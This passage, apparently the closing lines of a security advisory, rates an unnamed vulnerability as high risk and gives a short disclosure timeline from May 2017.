The vulnerability is therefore rated as a high risk.


Timeline


2017-05-16 Vulnerability identified
2017-05-23 Customer approved disclosure of vulnerability